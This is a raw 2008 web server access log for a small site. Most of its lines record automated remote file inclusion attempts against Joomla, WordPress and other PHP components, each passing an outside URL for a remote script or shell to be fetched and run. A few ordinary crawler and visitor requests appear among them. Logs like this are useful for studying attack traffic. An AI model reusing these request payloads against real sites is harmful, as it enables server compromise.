87.117.252.170 - - [29/Apr/2008:11:55:37 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:55:38 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:55:39 -0700] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.16.17.221 - - [29/Apr/2008:11:55:48 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://h1.ripway.com/vagabunss/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:55:58 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:56:12 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:11:56:28 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.95.82.113 - - [29/Apr/2008:11:56:38 -0700] "GET /%033%3Cbug%3Ehttp://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
74.95.82.113 - - [29/Apr/2008:11:56:39 -0700] "GET /logs/%033%3Cbug%3Ehttp://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
195.74.37.170 - - [29/Apr/2008:11:56:48 -0700] "GET /logs/access_080122.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.74.37.170 - - [29/Apr/2008:11:56:48 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.74.37.170 - - [29/Apr/2008:11:56:48 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.74.37.170 - - [29/Apr/2008:11:57:02 -0700] "GET /logs/access_080128.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.93.147.155 - - [29/Apr/2008:11:57:19 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.geocities.com/cahayaindra/boss.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:11:57:20 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:11:57:20 -0700] "GET /logs/send_reminders.php?includedir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:11:57:20 -0700] "GET /send_reminders.php?includedir=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.172.175.130 - - [29/Apr/2008:11:57:24 -0700] "GET /logs/send_reminders.php?includedir=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
217.172.175.130 - - [29/Apr/2008:11:57:25 -0700] "GET /send_reminders.php?includedir=http://xuxulio.iespana.es/xuxuon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:11:57:25 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:11:58:48 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:11:58:48 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:11:58:49 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.190.1.171 - - [29/Apr/2008:11:59:03 -0700] "GET /logs/access_080215.log//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.145.28.20 - - [29/Apr/2008:11:59:17 -0700] "GET //includes/getlang.php?dir_path=http://www.taow.net/league/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.95.82.113 - - [29/Apr/2008:11:59:39 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
74.95.82.113 - - [29/Apr/2008:11:59:39 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
195.70.35.179 - - [29/Apr/2008:11:59:41 -0700] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
81.176.77.163 - - [29/Apr/2008:12:00:29 -0700] "GET /logs/access_080122.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.176.77.163 - - [29/Apr/2008:12:00:29 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.176.77.163 - - [29/Apr/2008:12:00:30 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:12:00:32 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:12:00:33 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:12:00:33 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:12:00:55 -0700] "GET /logs/access_080227.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:12:00:55 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
206.168.112.10 - - [29/Apr/2008:12:00:56 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.mizunobr.web.terra.com.br/sc.txt??????? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:12:01:16 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:12:01:20 -0700] "GET /logs/access_080218.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.176.77.163 - - [29/Apr/2008:12:01:24 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.176.77.163 - - [29/Apr/2008:12:01:25 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.55.6.34 - - [29/Apr/2008:12:01:26 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [29/Apr/2008:12:01:26 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.6.34 - - [29/Apr/2008:12:01:28 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
58.26.137.64 - - [29/Apr/2008:12:01:36 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
67.201.38.75 - - [29/Apr/2008:12:02:21 -0700] "GET /modules/My_eGallery/public/errors.php?error=http://212.115.13.140:82//appserv/r.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.201.38.75 - - [29/Apr/2008:12:02:21 -0700] "GET /logs/modules/My_eGallery/public/errors.php?error=http://212.115.13.140:82//appserv/r.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.74.37.170 - - [29/Apr/2008:12:03:08 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.74.37.170 - - [29/Apr/2008:12:03:09 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:12:03:32 -0700] "GET /logs/access_080201.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:12:03:32 -0700] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.224.203 - - [29/Apr/2008:12:03:33 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.179.218 - - [29/Apr/2008:12:03:50 -0700] "GET /logs/access.log/content/multithumb/multithumb?mosConfig_absolute_path=http://www.peccu.org/components/com_extcalendar/images/minipics/def_pics.gif/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
65.55.211.30 - - [29/Apr/2008:12:04:08 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.30 - - [29/Apr/2008:12:04:09 -0700] "GET /minamijewelry/?D=A HTTP/1.1" 200 2110 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
91.195.28.2 - - [29/Apr/2008:12:04:13 -0700] "GET /logs/forum.php?act=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.28.2 - - [29/Apr/2008:12:04:18 -0700] "GET /forum.php?act=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.211.37 - - [29/Apr/2008:12:04:23 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.211.37 - - [29/Apr/2008:12:04:24 -0700] "GET /minamijewelry/?M=A HTTP/1.1" 200 2110 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
67.15.8.53 - - [29/Apr/2008:12:04:29 -0700] "GET /logs//includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.217.247.200 - - [29/Apr/2008:12:04:33 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://bajigur.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.15.8.53 - - [29/Apr/2008:12:04:36 -0700] "GET //includes/db_connect.php?baseDir=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.217.247.200 - - [29/Apr/2008:12:04:37 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://bajigur.net/safe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
124.217.247.200 - - [29/Apr/2008:12:04:38 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://bajigur.net/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:12:04:41 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:12:04:42 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:12:04:42 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.115.110.89 - - [29/Apr/2008:12:04:42 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.55.6.34 - - [29/Apr/2008:12:04:43 -0700] "GET /logs/access_080201.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.15.107.13 - - [29/Apr/2008:12:05:15 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.15.107.13 - - [29/Apr/2008:12:05:15 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.118.61.180 - - [29/Apr/2008:12:05:26 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.118.61.180 - - [29/Apr/2008:12:05:31 -0700] "GET / HTTP/1.1" 200 11606 "http://www.st-owners.com/forums/showthread.php?t=38744" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
71.118.61.180 - - [29/Apr/2008:12:05:31 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9037 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
71.118.61.180 - - [29/Apr/2008:12:05:41 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 200 3072529 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
200.255.103.140 - - [29/Apr/2008:12:05:58 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://simoneleitao.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.118.61.180 - - [29/Apr/2008:12:06:02 -0700] "GET /blog/wp-content/uploads/2008/04/img_1123.JPG HTTP/1.1" 200 4659669 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
71.118.61.180 - - [29/Apr/2008:12:06:09 -0700] "GET /blog/wp-content/uploads/2008/04/img_1133.JPG HTTP/1.1" 200 5288628 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
71.118.61.180 - - [29/Apr/2008:12:06:10 -0700] "GET /blog/wp-content/uploads/2008/04/img_1124.JPG HTTP/1.1" 200 917504 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
92.48.75.104 - - [29/Apr/2008:12:06:13 -0700] "GET /logs/access_080312.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
71.118.61.180 - - [29/Apr/2008:12:06:21 -0700] "GET /blog/index.php/2008/04/03/hello-world/ HTTP/1.1" 200 7189 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
71.118.61.180 - - [29/Apr/2008:12:06:21 -0700] "GET /blog/wp-content/uploads/2008/04/crestoc07-3.jpg HTTP/1.1" 200 51084 "http://dmulk.com/blog/2008/04/03/hello-world/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
71.118.61.180 - - [29/Apr/2008:12:06:21 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://dmulk.com/blog/2008/04/03/hello-world/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
71.118.61.180 - - [29/Apr/2008:12:06:21 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.1" 200 1014 "http://dmulk.com/blog/2008/04/03/hello-world/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
71.118.61.180 - - [29/Apr/2008:12:06:22 -0700] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://dmulk.com/blog/2008/04/03/hello-world/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
71.118.61.180 - - [29/Apr/2008:12:06:22 -0700] "GET /blog/wp-content/themes/default/images/kubrickfooter.jpg HTTP/1.1" 200 2443 "http://dmulk.com/blog/2008/04/03/hello-world/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
71.118.61.180 - - [29/Apr/2008:12:06:22 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
81.176.77.163 - - [29/Apr/2008:12:06:35 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.176.77.163 - - [29/Apr/2008:12:06:35 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://h1.ripway.com/cicir0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
71.118.61.180 - - [29/Apr/2008:12:06:43 -0700] "GET /blog/wp-content/uploads/2008/04/img_1133.JPG HTTP/1.1" 200 1900544 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
71.118.61.180 - - [29/Apr/2008:12:06:43 -0700] "GET /blog/wp-content/uploads/2008/04/img_1124.JPG HTTP/1.1" 200 1769472 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "dmulk.com"
87.117.252.170 - - [29/Apr/2008:12:06:58 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:12:06:58 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:12:06:59 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
195.122.243.226 - - [29/Apr/2008:12:07:17 -0700] "GET /modules/My_eGallery/public/errors.php?error=http://212.115.13.140:82//appserv/r.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
195.122.243.226 - - [29/Apr/2008:12:07:17 -0700] "GET /logs/modules/My_eGallery/public/errors.php?error=http://212.115.13.140:82//appserv/r.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:12:07:24 -0700] "GET /logs/access_080329.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:12:07:25 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.117.252.170 - - [29/Apr/2008:12:07:25 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.freewebtown.com/op1123/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.76.116.20 - - [29/Apr/2008:12:07:32 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [29/Apr/2008:12:07:32 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [29/Apr/2008:12:07:32 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.76.116.20 - - [29/Apr/2008:12:07:32 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://yoga0400.org/injek2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.132.204.166 - - [29/Apr/2008:12:07:36 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.132.204.166 - - [29/Apr/2008:12:07:36 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.249.155.6 - - [29/Apr/2008:12:07:37 -0700] "GET /logs/home.php?content=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.251.123 - - [29/Apr/2008:12:07:38 -0700] "GET /logs/access_080219.log//includes/getlang.php?dir_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
147.202.44.247 - - [29/Apr/2008:12:07:39 -0700] "GET /logs/errors.php?error=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.251.123 - - [29/Apr/2008:12:07:39 -0700] "GET //includes/getlang.php?dir_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
147.202.44.247 - - [29/Apr/2008:12:07:39 -0700] "GET /errors.php?error=http://www.upfni.com//modules/Forums/admin/.muie/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.251.123 - - [29/Apr/2008:12:07:39 -0700] "GET /logs//includes/getlang.php?dir_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.249.155.6 - - [29/Apr/2008:12:07:42 -0700] "GET /logs/home.php?content=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.249.155.6 - - [29/Apr/2008:12:07:42 -0700] "GET /home.php?content=ftp://84.32.137.157/incoming/upload/trex/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
